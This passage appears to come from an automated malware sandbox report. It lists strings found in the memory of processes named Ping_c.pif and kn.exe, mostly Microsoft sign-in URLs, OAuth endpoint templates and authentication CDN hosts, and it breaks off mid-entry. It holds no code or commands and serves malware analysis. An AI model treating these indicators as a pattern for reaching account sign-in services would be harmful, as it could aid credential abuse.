        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=0AF2CDA0278E26DD&opid=AA6F3B4A901F325
        Source: Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=140B94D0A89BAC5B&opid=890C5555777F28C
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=18A8D9815092E124&opid=53E1510DC81D2C9
        Source: Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=1A28F24F3A0C62E2&opid=DA215CBA73B8C1D
        Source: Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=2852E581C330F4F5&opid=37C420339CE2257
        Source: Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=28D084576CBCC1A4&opid=80E3768805479CB
        Source: Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012764000.0000000027235000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012764000.0000000027228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=319ABC075F082527&opid=21BBA881A27C97C
        Source: Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=3B29555887FD8215&opid=7908080ABA4F259
        Source: Ping_c.pif, 0000001F.00000003.2250753517.0000000027273000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027280000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2251644605.0000000027236000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2251024340.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=416793654422A2A2&opid=9F9403001CB35BE
        Source: Ping_c.pif, 0000001F.00000002.2727134039.0000000027277000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=4618DC44B81ABFBC&opid=0A688BA368B69DB
        Source: Ping_c.pif, 0000001F.00000003.1853165591.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1860021021.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=50D4DD5A3A4DD0A4&opid=8528A328950AD0B
        Source: Ping_c.pif, 0000001F.00000003.2144487772.0000000027222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=51057F6240810432&opid=78AE070C2243ADD
        Source: Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1819846373.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=56ABE80EB46EF043&opid=CE25312F033C243
        Source: Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2393740582.0000000027236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=5CAAA89783989808&opid=FF6CBFE54A4AFE2
        Source: Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634197074.00000000271E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=5E822A3BF427095F&opid=4EF04E5343DE37C
        Source: Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1882008954.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=66F85AEE6E1A38D2&opid=9AF4E5AF00B6C53
        Source: Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=6FD3B6FE9CA439BE&opid=534E6536191DA6B
        Source: Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002723D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=8BB159EC545FD4CC&opid=B8E6087820D9061
        Source: Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=99D40BDA67A73992&opid=EC15FC25298BDAB
        Source: Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1666645491.00000000271EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=9F357AA6BB3F5705&opid=942879AACE6E273
        Source: Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=9F87C516A70FE86C&opid=1E876D9E7ED75F2
        Source: Ping_c.pif, 0000001F.00000003.2587623073.0000000027277000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027284000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.0000000027232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=A8960C55EC47E0A0&opid=FE5D123C67DA08E
        Source: Ping_c.pif, 0000001F.00000003.1592357798.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=AD11851EFE6E1178&opid=CDC16117E87353B
        Source: Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=AE37B53AADDEF385&opid=75D23D4F0925B61
        Source: Ping_c.pif, 0000001F.00000003.2427994029.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=B5C6D2470337F95A&opid=CF1911A3824D773
        Source: Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C95F0BAF198CA94E&opid=93403BF04007A13
        Source: Ping_c.pif, 0000001F.00000003.2111719555.000000002721A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2112272992.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C9A28159FFE82111&opid=262425754920DCC
        Source: Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216187948.000000002722A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C9B559A05F5FBD8F&opid=96CAF3B15C5F7EC
        Source: Ping_c.pif, 0000001F.00000003.2080225046.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=F1416000186E1BE8&opid=114202D085518AA
        Source: Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1952917186.0000000027216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=F487681EF4BF506A&opid=93539CF5DF35121
        Source: Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1986181997.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=FBC5B09AC4FC4D5F&opid=C97772AF3A35076
        Source: Ping_c.pif, 0000001F.00000003.1786740158.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsig
        Source: Ping_c.pif, 0000001F.00000002.2726741587.00000000271E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1
        Source: Ping_c.pif, 0000001F.00000003.2177405424.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&r
        Source: Ping_c.pif, 0000001F.00000003.1634328519.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928543&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1706868174.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706715603.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1859752445.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2020192072.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2111822434.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928591&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2216274021.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928594&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2177405424.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928598&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2216187948.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427092342.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928602&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2428114955.000000002721B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2428114955.00000000271E7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928623&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928632&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928636&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2703452505.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1593066185.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928539&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928547&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928558&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1853005680.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888960239.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953069294.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1921671898.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921671898.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928572&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.
        Source: Ping_c.pif, 0000001F.00000003.1953069294.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1985865304.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928579&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2048890593.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.000000002721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928585&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2080225046.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928605&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928609&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2321332613.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928612&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928616&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2427092342.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928619&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928626&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2492438082.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928629&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928639&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928642&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2726741587.00000000271E0000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928646&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.055
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/s
        Source: Ping_c.pif, 0000001F.00000003.1706671192.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/t
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/z
        Source: Ping_c.pif, 0000001F.00000003.1633821115.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634328519.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1666497605.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/~
        Source: Ping_c.pif, 0000001F.00000003.1706715603.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1859752445.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.2020192072.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1744390876.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737745516.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1882235098.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.2080476478.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SS
        Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
        Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
        Source: Ping_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.ms
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460371452.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888837366.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 